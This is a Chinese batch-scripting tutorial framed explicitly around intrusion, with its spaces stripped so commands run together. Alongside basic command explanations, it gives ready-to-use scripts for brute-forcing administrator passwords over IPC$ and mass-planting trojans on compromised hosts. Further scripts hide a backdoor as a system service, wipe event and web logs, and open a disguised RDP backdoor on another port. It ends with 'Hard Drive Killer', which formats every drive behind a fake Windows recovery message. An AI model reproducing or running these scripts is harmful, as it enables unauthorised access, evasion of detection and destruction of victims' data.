批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为.bat或.cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。
一.简单批处理内部命令简介
1.Echo命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo命令将显示当前回显设置。
语法
echo[{on|off}][message]
Sample:@echooff/echohelloworld
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用>>>^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。
2.@命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echooff
@echoNowinitializingtheprogram,pleasewaitaminite...
@formatX:/q/u/autoset(format这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)
3.Goto命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:gotolabel(label是参数,指定所要转向的批处理程序中的行。)
Sample:
if{%1}=={}gotonoparms
if{%2}=={}gotonoparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)
@Remcheckparametersifnullshowusage
:noparms
echoUsage:monitor.batServerIPPortNumber
gotoend
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。
4.Rem命令
注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
RemMessage
Sample:@RemHereisthedescription.
5.Pause命令
运行Pause命令时,将显示下面的消息:
Pressanykeytocontinue...
Sample:
@echooff
:begin
copya:*.*d:\back
echoPleaseputanewdiskintodriverA
pause
gotobegin
在这个例子中,驱动器A中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器A时,pause命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。
6.Call命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call命令接受用作调用目标的标签。如果在脚本或批处理文件外使用Call,它将不会在命令行起作用。
语法
call[[Drive:][Path]FileName[BatchParameters]][:label[arguments]]
参数
[Drive:}[Path]FileName
指定要调用的批处理程序的位置和名称。filename参数必须具有.bat或.cmd扩展名。
7.start命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN开始时窗口最小化
SEPARATE在分开的空间内开始16位Windows程序
HIGH在HIGH优先级类别开始应用程序
REALTIME在REALTIME优先级类别开始应用程序
WAIT启动应用程序并等候它结束
parameters这些为传送到命令/程序的参数
执行的应用程序是32-位GUI应用程序时,CMD.EXE不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
8.choice命令
choice使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
如:choice/c:dmedefrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echooff
choice/c:dmedefrag,mem,end
iferrorlevel3gotodefrag(应先判断数值最高的错误码)
iferrorlevel2gotomem
iferrotlevel1gotoend
:defrag
c:\dos\defrag
gotoend
:mem
mem
gotoend
:end
echogoodbye
此文件运行后,将显示defrag,mem,end[D,M,E]?用户可选择dme,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以gotoend将程序跳到end标号处,然后程序将显示goodbye,文件结束。
9.If命令
if表示将判断是否符合规定的条件,从而决定执行不同的命令。有三种格式:
1、if"参数"=="字符串" 待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
如if"%1"=="a"formata:
if{%1}=={}gotonoparms
if{%2}=={}gotonoparms
2、ifexist文件名 待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如ifexistconfig.syseditconfig.sys
3、iferrorlevel/ifnoterrorlevel数字 待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如iferrorlevel2gotox2
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。
10.for命令
for命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用FOR命令时,指定变量请使用%%variable
for{%variable|%%variable}in(set)docommand[CommandLineOptions]
%variable指定一个单一字母可替换的参数。
(set)指定一个或一组文件。可以使用通配符。
command指定对每个文件执行的命令。
command-parameters为特定命令指定参数或命令行开关。
在批处理文件中使用FOR命令时,指定变量请使用%%variable
而不要用%variable。变量名称是区分大小写的,所以%i不同于%I
如果命令扩展名被启用,下列额外的FOR命令格式会受到
支持:
FOR/D%variableIN(set)DOcommand[command-parameters]
如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。
FOR/R[[drive:]path]%variableIN(set)DOcommand[command-
检查以[drive:]path为根的目录树,指向每个目录中的
FOR语句。如果在/R后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。
FOR/L%variableIN(start,step,end)DOcommand[command-para
该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5)将产生序列12345,(5,-1,1)将产生
序列(54321)。
FOR/F["options"]%variableIN(file-set)DOcommand
FOR/F["options"]%variableIN("string"DOcommand
FOR/F["options"]%variableIN(command)DOcommand
或者,如果有usebackq选项:
FOR/F["options"]%variableIN(file-set)DOcommand
FOR/F["options"]%variableIN("string"DOcommand
FOR/F["options"]%variableIN(command)DOcommand
filenameset为一个或多个文件名。继续到filenameset中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用For循环。以默认方式,/F通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选"options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:
eol=c-指一个行注释字符的结尾(就一个)
skip=n-指在文件开始时忽略的行数。
delims=xxx-指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n-指每行的哪一个符号被传递到每个迭代
的for本身。这会导致额外变量名称的
格式为一个范围。通过nth符号指定m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq-指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在fi
中使用双引号扩起文件名称。
sample1:
FOR/F"eol=;tokens=2,3*delims=,"%iin(myfile.txt)docommand
会分析myfile.txt中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给for程序体;用逗号和/或
空格定界符号。请注意,这个for程序体的语句引用%i来
取得第二个符号,引用%j来取得第三个符号,引用%k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用usebackq选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。
%i专门在for语句中得到说明,%j和%k是通过
tokens=选项专门得到说明的。您可以通过tokens=一行
指定最多26个符号,只要不试图说明一个高于字母z或
Z的变量。请记住,FOR变量是单一字母、分大小写和全局的;
同时不能有52个以上都在使用中。
您还可以在相邻字符串上使用FOR/F分析逻辑;方法是,
用单引号将括号之间的filenameset括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。
最后,您可以用FOR/F命令来分析命令的输出。方法是,将
括号之间的filenameset变成一个反括字符串。该字符串会
被当作命令行,传递到一个子CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:
FOR/F"usebackqdelims=="%iIN(`set`)DO@echo%i
会枚举当前环境中的环境变量名称。
另外,FOR变量参照的替换已被增强。您现在可以使用下列
选项语法:
~I-删除任何引号(",扩充%I
%~fI-将%I扩充到一个完全合格的路径名
%~dI-仅将%I扩充到一个驱动器号
%~pI-仅将%I扩充到一个路径
%~nI-仅将%I扩充到一个文件名
%~xI-仅将%I扩充到一个文件扩展名
%~sI-扩充的路径只含有短名
%~aI-将%I扩充到文件的文件属性
%~tI-将%I扩充到文件的日期/时间
%~zI-将%I扩充到文件的大小
%~$PATH:I-查找列在路径环境变量的目录,并将%I扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串
可以组合修饰符来得到多重结果:
%~dpI-仅将%I扩充到一个驱动器号和路径
%~nxI-仅将%I扩充到一个文件名和扩展名
%~fsI-仅将%I扩充到一个带有短名的完整路径名
%~dp$PATH:i-查找列在路径环境变量的目录,并将%I扩充
到找到的第一个驱动器号和路径。
%~ftzaI-将%I扩充到类似输出线路的DIR
在以上例子中,%I和PATH可用其他有效数值代替。%~语法
用一个有效的FOR变量名终止。选取类似%I的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。
以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。
sample2:
利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用netuse$">\\ip\ipc$"password"/u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。
最主要的命令是一条:for/fi%in(dict.txt)donetuse$">\\ip\ipc$"i%"/u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用netuse命令来连接。然后将程序运行结果传递给find命令--
for/fi%%in(dict.txt)donetuse$">\\ip\ipc$"i%%"/u:"administrator"|find":命令成功完成">>D:\ok.txt,这样就ko了。
sample3:
你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。
主要命令也只有一条:(在批处理文件中使用FOR命令时,指定变量使用%%variable)
@for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcalldoor.bat%%i%%j%%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i%j%k。
而cultivate.bat无非就是用netuse命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(Iferrorlever=)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims=表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i%%j%%k表示的对象来排列,一般就是ippasswordusername。
代码雏形:
---------------cutherethensaveasabatchfile(Icallitmain.bat)---------------------------
@echooff
@if"%1"==""gotousage
@for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcallIPChack.bat%%i%%j%%k
@gotoend
:usage
@echorunthisbatchindosmodle.orjustdouble-clickit.
:end
---------------cutherethensaveasabatchfile(Icallitmain.bat)---------------------------
-------------------cutherethensaveasabatchfile(Icallitdoor.bat)-----------------------------
@netuse$">\\%1\ipc$%3/u:"%2"
@iferrorlevel1gotofailed
@echoTryingtoestablishtheIPC$connection…………OK
@copywindrv32.exe\\%1\admin$\system32&&ifnoterrorlevel1echoIP%1USER%2PWD%3>>ko.txt
@ps\\%1c:\winnt\system32\windrv32.exe
@ps\\%1netstartwindrv32&&ifnoterrorlevel1echo%1Backdoored>>ko.txt
:failed
@echoSorrycannotconnectedtothevictim.
-----------------cutherethensaveasabatchfile(Icallitdoor.bat)--------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PS.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.
二.如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echooff
if"%1"=="a"formata:
:format
@formata:/q/u/auotset
@echopleaseinsertanotherdisktodriverA.
@pause
@gotofomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bata,呵呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ippasswordusername当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echooff
@netuse$">\\1%\ipc$"2%"/u:"3%"注意哦,这里PASSWORD是第二个参数。
@iferrorlevel1echoconnectionfailed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3
三.如何使用组合命令(CompoundCommand)
1.&
Usage:第一条命令&第二条命令[&第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功
Sample:
C:\>dirz:&dirc:\Ex4rch
Thesystemcannotfindthepathspecified.
VolumeindriveChasnolabel.
VolumeSerialNumberis0078-59FB
Directoryofc:\Ex4rch
2002-05-1423:51
.
2002-05-1423:51
..
2002-05-1423:5114sometips.gif
2.&&
Usage:第一条命令&&第二条命令[&&第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;
Sample:
C:\>dirz:&&dirc:\Ex4rch
Thesystemcannotfindthepathspecified.
C:\>dirc:\Ex4rch&&dirz:
VolumeindriveChasnolabel.
VolumeSerialNumberis0078-59FB
Directoryofc:\Ex4rch
2002-05-1423:55
.
2002-05-1423:55
..
2002-05-1423:5514sometips.gif
1File(s)14bytes
2Dir(s)768,671,744bytesfree
Thesystemcannotfindthepathspecified.
在做备份的时候可能会用到这种命令会比较简单,如:
dirfile://192.168.0.1/database/backup.mdb&©file://192.168.0.1/database/backup.mdbE:\backup
如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IFexist了:)
3.||
Usage:第一条命令||第二条命令[||第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;
Sample:
C:\Ex4rch>dirsometips.gif||delsometips.gif
VolumeindriveChasnolabel.
VolumeSerialNumberis0078-59FB
DirectoryofC:\Ex4rch
2002-05-1423:5514sometips.gif
1File(s)14bytes
0Dir(s)768,696,320bytesfree
组合命令使用的例子:
sample:
@copytrojan.exe$\system32">\\%1\admin$\system32&&ifnoterrorlevel1echoIP%1USER%2PASS%3>>victim.txt
四、管道命令的使用
1.|命令
Usage:第一条命令|第二条命令[|第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
sample:
time/t>>D:\IP.log
netstat-n-ptcp|find":3389">>D:\IP.log
startExplorer
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。
2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中,>与>>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
sample1:
echohelloworld>c:\hello.txt(stupidexample?)
sample2:
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:
运行CMD--转换目录到system32--dir*.exe>exeback.txt&dir*.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD--fcexeback.txtexeback1.txt>diff.txt&fcdllback.txtdllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32/utrojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。
3.<、>&、<&
<从文件中而不是从键盘中读入命令输入。
>&将一个句柄的输出写入到另一个句柄的输入中。
<&从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。
No.5
五.如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“Stringvalue”
door的类型是“REGSZvalue”
Autodos的类型是“DWORDvalue”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit/s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
WindowsRegistryEditorVersion5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echoWindowsRegistryEditorVersion5.00>>Sample.reg
@echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo"Invader"="Ex4rch">>Sample.reg
@echo"door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo"Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Run)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@startwindrv32.exe
@attrib+h+rwindrv32.exe
@echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>patch.dll
@echo"windsnx"=->>patch.dll
@sc.execreateWindriversrvtype=kernelstart=autodisplayname=WindowsDriverbinpath=c:\winnt\system32\windrv32.exe
@regedit/spatch.dll
@deletepatch.dll
@REM[删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM这样不是更安全^_^.
六.精彩实例放送。
1.删除win2k/xp系统默认共享的批处理
------------------------cutherethensaveas.bator.cmdfile---------------------------
@echopreparingtodeleteallthedefaultshares.whenreadypresanykey.
@pause
@echooff
:Remcheckparametersifnullshowusage.
if{%1}=={}goto:Usage
:Remcodestart.
echo.
echo------------------------------------------------------
echo.
echoNowdeletingallthedefaultshares.
echo.
netshare%1$/delete
netshare%2$/delete
netshare%3$/delete
netshare%4$/delete
netshare%5$/delete
netshare%6$/delete
netshare%7$/delete
netshare%8$/delete
netshare%9$/delete
netstopServer
netstartServer
echo.
echoAlltheshareshavebeendeleteed
echo.
echo------------------------------------------------------
echo.
echoNowmodifytheregistrytochangethesystemdefaultproperties.
echo.
echoNowcreatingtheregistryfile
echoWindowsRegistryEditorVersion5.00>c:\delshare.reg
echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>c:\delshare.reg
echo"AutoShareWks"=dword:00000000>>c:\delshare.reg
echo"AutoShareServer"=dword:00000000>>c:\delshare.reg
echoNowingusingtheregistryfiletochangthesystemdefaultproperties.
regedit/sc:\delshare.reg
echoDeletingthetemprotarilyfiles.
delc:\delshare.reg
goto:END
:Usage
echo.
echo------------------------------------------------------
echo.
echo☆Aexampleforbatchfile☆
echo☆[Usebatchfiletochangethesysytemshareproperties.]☆
echo.
echoAuthor:Ex4rch
echoMail:Ex4rch@hotmail.comQQ:1672602
echo.
echoError:Notenoughparameters
echo.
echo☆Pleaseenterthesharediskyouwannadelete☆
echo.
echoForinstance,todeletethedefaultshares:
echodelsharecdeipcadminprint
echo.
echoIfthedisklableisnotasC:D:E:,Pleasechangityouself.
echo.
echoexample:
echoIflocakdisklableareC:D:E:X:Y:Z:,youshouldchangthecommandinto:
echodelsharecdexyzipcadminprint
echo.
echo***youcandeleteninesharesonceinauseing***
echo.
echo------------------------------------------------------
goto:EOF
:END
echo.
echo------------------------------------------------------
echo.
echoOK,delshare.bathasdeletedalltheshareyouassigned.
echo.Anyquestions,feelfreetomailtoEx4rch@hotmail.com.
echo
echo.
echo------------------------------------------------------
echo.
:EOF
echoendofthebatchfile
------------------------cutherethensaveas.bator.cmdfile---------------------------
2.全面加固系统(给肉鸡打补丁)的批处理文件
------------------------cutherethensaveas.bator.cmdfile---------------------------
@echoWindowsRegistryEditorVersion5.00>patch.dll
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>patch.dll
@echo"AutoShareServer"=dword:00000000>>patch.dll
@echo"AutoShareWks"=dword:00000000>>patch.dll
@REM[禁止共享]
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>patch.dll
@echo"restrictanonymous"=dword:00000001>>patch.dll
@REM[禁止匿名登录]
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>patch.dll
@echo"SMBDeviceEnabled"=dword:00000000>>patch.dll
@REM[禁止及文件访问和打印共享]
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry]>>patch.dll
@echo"Start"=dword:00000004>>patch.dll
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]>>patch.dll
@echo"Start"=dword:00000004>>patch.dll
@echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]>>patch.dll
@echo"ShutdownWithoutLogon"="0">>patch.dll
@REM[禁止登录前关机]
@echo"DontDisplayLastUserName"="1">>patch.dll
@REM[禁止显示前一个登录用户名称]
@regedit/spatch.dll
------------------------cutherethensaveas.bator.cmdfile---------------------------
下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnalservice留跳后路。
@regedit/spatch.dll
@netstopw3svc
@netstopeventlog
@delc:\winnt\system32\logfiles\w3svc1\*.*/f/q
@delc:\winnt\system32\logfiles\w3svc2\*.*/f/q
@delc:\winnt\system32\config\*.event/f/q
@delc:\winnt\system32dtclog\*.*/f/q
@delc:\winnt\*.txt/f/q
@delc:\winnt\*.log/f/q
@netstartw3svc
@netstarteventlog
@rem[删除日志]
@netstoplanmanserver/y
@netstopSchedule/y
@netstopRemoteRegistry/y
@delpatch.dll
@echoTheserverhasbeenpatched,Havefun.
@delpatch.bat
@REM[禁止一些危险的服务。]
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]>>patch.dll
@echo"PortNumber"=dword:00002010>>patch.dll
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp>>patch.dll
@echo"PortNumber"=dword:00002012>>patch.dll
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>patch.dll
@echo"Start"=dword:00000002>>patch.dll
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]>>patch.dll
@echo"Start"=dword:00000002>>patch.dll
@echo"ErrorControl"=dword:00000001>>patch.dll
@echo"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>patch.dll
@echo74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\>>patch.dll
@echo00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00>>patch.dll
@echo"ObjectName"="LocalSystem">>patch.dll
@echo"Type"=dword:00000010>>patch.dll
@echo"Description"="Keeprecordoftheprogramandwindowsmessage。">>patch.dll
@echo"DisplayName"="MicrosoftEventLog">>patch.dll
@echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]>>patch.dll
@echo"Start"=dword:00000004>>patch.dll
@copyc:\winnt\system32\termsrv.exec:\winnt\system32\eventlog.exe
@REM[修改3389连接,端口为8210(十六进制为00002012),名称为MicrosoftEventLog,留条后路]
3.HardDriveKillerProVersion4.0(玩批处理到这个水平真的不容易了。)
------------------------cutherethensaveas.bator.cmdfile---------------------------
@echooff
remThisprogramisdedecatedtoaveryspecialpersonthatdoesnotwanttobenamed.
:start
cls
echoPLEASEWAITWHILEPROGRAMLOADS...
callattrib-r-hc:\auto.bat>nul
echo@echooff>c:\auto.bat
echocallformatc:/q/u/autoSample>nul>>c:\auto.bat
callattrib+r+hc:\auto.bat>nul
remDrivecheckingandassigningthevaliddrivestothedrivevariable.
setdrive=
setalldrive=cdefghijklmnopqrstuvwxyz
remcodeinsertionforDriveCheckingtakesplacehere.
remdrivechk.batisthefilenameundertherootdirectory.
remAsfarasthedrivedetectionanddrivevariablesettings,dontworryabouthowit
remworks,itsd\*amntocomplicatedfortheaverageoreventheexpertbatchprogrammer.
remExceptforTomLavedas.
echo@echooff>drivechk.bat
echo@prompt%%%%comspec%%%%/f/cvol%%%%1:$bfind"Vol">nul>{t}.bat
%comspec%/e:2048/c{t}.bat>>drivechk.bat
del{t}.bat
echoiferrorlevel1gotoenddc>>drivechk.bat
cls
echoPLEASEWAITWHILEPROGRAMLOADS...
remWhenerrorlevelis1,thentheaboveisnottrue,if0,thenitstrue.
remOppositeofbinaryrules.If0,itwillelapstothenextcommand.
echo@prompt%%%%comspec%%%%/f/cdir%%%%1:.\/ad/w/-p$bfind"bytes">nul>{t}.bat
%comspec%/e:2048/c{t}.bat>>drivechk.bat
del{t}.bat
echoiferrorlevel1gotoenddc>>drivechk.bat
cls
echoPLEASEWAITWHILEPROGRAMLOADS...
remiferrorlevelis1,thenthedrivespecifiedisaremovablemediadrive-notready.
remiferrorlevelis0,thenitwillelapstothenextcommand.
echo@promptdir%%%%1:.\/ad/w/-p$bfind"0bytesfree">nul>{t}.bat
%comspec%/e:2048/c{t}.bat>>drivechk.bat
del{t}.bat
echoiferrorlevel1setdrive=%%drive%%%%1>>drivechk.bat
cls
echoPLEASEWAITWHILEPROGRAMLOADS...
remifitserrorlevel1,thenthespecifieddriveisahardorfloppydrive.
remifitsnoterrorlevel1,thenthespecifieddriveisaCD-ROMdrive.
echo:enddc>>drivechk.bat
remDrivecheckinginsertionendshere."enddc"standsfor"enddDRIVEcHECKING".
remNowwewillusetheprogramdrivechk.battoattainvaliddriveinformation.
:Sampledrv
for%%ain(%alldrive%)docalldrivechk.bat%%a>nul
deldrivechk.bat>nul
if%drive.==.setdrive=c
:form_del
callattrib-r-hc:\auto.bat>nul
echo@echooff>c:\auto.bat
echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\auto.bat
echofor%%%%ain(%drive%)docallformat%%%%a:/q/u/autoSample>nul>>c:\auto.bat
echocls>>c:\auto.bat
echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\auto.bat
echofor%%%%ain(%drive%)docallc:\temp.bat%%%%aBunga>nul>>c:\auto.bat
echocls>>c:\auto.bat
echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\auto.bat
echofor%%%%ain(%drive%)calldeltree/y%%%%a:\>nul>>c:\auto.bat
echocls>>c:\auto.bat
echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\auto.bat
echofor%%%%ain(%drive%)docallformat%%%%a:/q/u/autoSample>nul>>c:\auto.bat
echocls>>c:\auto.bat
echoechoLoadingWindows,pleasewaitwhileMicrosoftWindowsrecoversyoursystem...>>c:\auto.bat
